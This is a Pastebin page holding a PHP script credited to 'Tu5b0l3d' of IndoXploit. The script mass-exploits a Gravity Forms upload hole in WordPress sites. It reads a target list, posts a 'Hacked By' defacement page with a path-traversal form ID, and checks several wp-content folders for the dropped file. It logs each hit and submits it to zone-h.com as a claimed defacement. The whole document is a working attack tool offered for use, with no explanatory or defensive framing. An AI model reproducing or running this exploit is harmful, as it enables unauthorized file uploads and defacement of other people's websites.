Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // Tu5b0l3d -IndoXploit-
- error_reporting(0);
- function ngirim_data($url, $post){
- $ch = curl_init ("$url");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
- $data6 = curl_exec ($ch);
- return $data6;
- }
- function save($data){
- $fp = @fopen("hasil_gravity_baruuu.htm", "a") or die("cant open file");
- fwrite($fp, $data);
- fclose($fp);
- }
- $buka=fopen("$argv[1]","r");
- $size=filesize("$argv[1]");
- $baca=fread($buka,$size);
- $sites = explode("<br>", $baca);
- foreach($sites as $site){
- $target = $site;
- $dir = array("", "wp-content", "wp-content/uploads", "wp-content/uploads/gravity_forms");
- $payload = "<head>
- <meta name='description' content='Hacked By Tu5b0l3d'>
- <title>Hacked By Tu5b0l3d</title>
- <link href='https://fonts.googleapis.com/css?family=Abel' rel='stylesheet' type='text/css'>
- <style>
- img{
- width: 30%;
- height: 50%;
- }
- </style>
- </head>
- <body bgcolor='black'> <center>
- <br><br><img src='http://selapan.hol.es/modif.jpg'><br><br>
- <b><font size='6px' face='Abel' color='white'>Hacked by Tu5b0l3d<br></b></font>
- <font face='Abel' color='white'><a href='http://indoxploit.blogspot.co.id/' style='text-decoration:none;color:red;font-size:20px;'>#IndoXploit</a><br>
- <br><br><i>Mr. Error 404 - Shor7cut - Bunglon ijo - Sohai - Jack Wilder - Tomhawk <br> Cyber_taregh - k3c0t - Rieqyns13 - Falcon-G21 </i>
- </center></font>
- <font color='black'>&field_id=k&form_id=1&gform_unique_id=../../../../../&name=.htm";
- $url = "http://$target/?gf_page=upload";
- echo "\n$url";
- $upload = ngirim_data($url, $payload);
- if(preg_match("/_input_k_/i", $upload)){
- foreach($dir as $path){
- $path_anu = "http://$target/$path/_input_k_.htm";
- $ch1 = curl_init ("$path_anu");
- curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
- $hacked = curl_exec ($ch1);
- if(preg_match("/hacked/i", $hacked)){
- save("$path_anu<br>");
- echo "\n$path_anu";
- $jones = "defacer=ID-IM&domain1=$path_anu&hackmode=1&reason=1&submit=Send";
- $url_jones = "http://www.zone-h.com/notify/single";
- $ngirim_jones = ngirim_data($url_jones, $jones);
- if(preg_match ("/color=\"red\">OK<\/font><\/li>/i", $ngirim_jones)){
- echo " \n#### Ok\n";
- }else{
- echo " \n#### No\n";
- } break;
- }
- }
- }
- else{
- echo " <============= No";
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement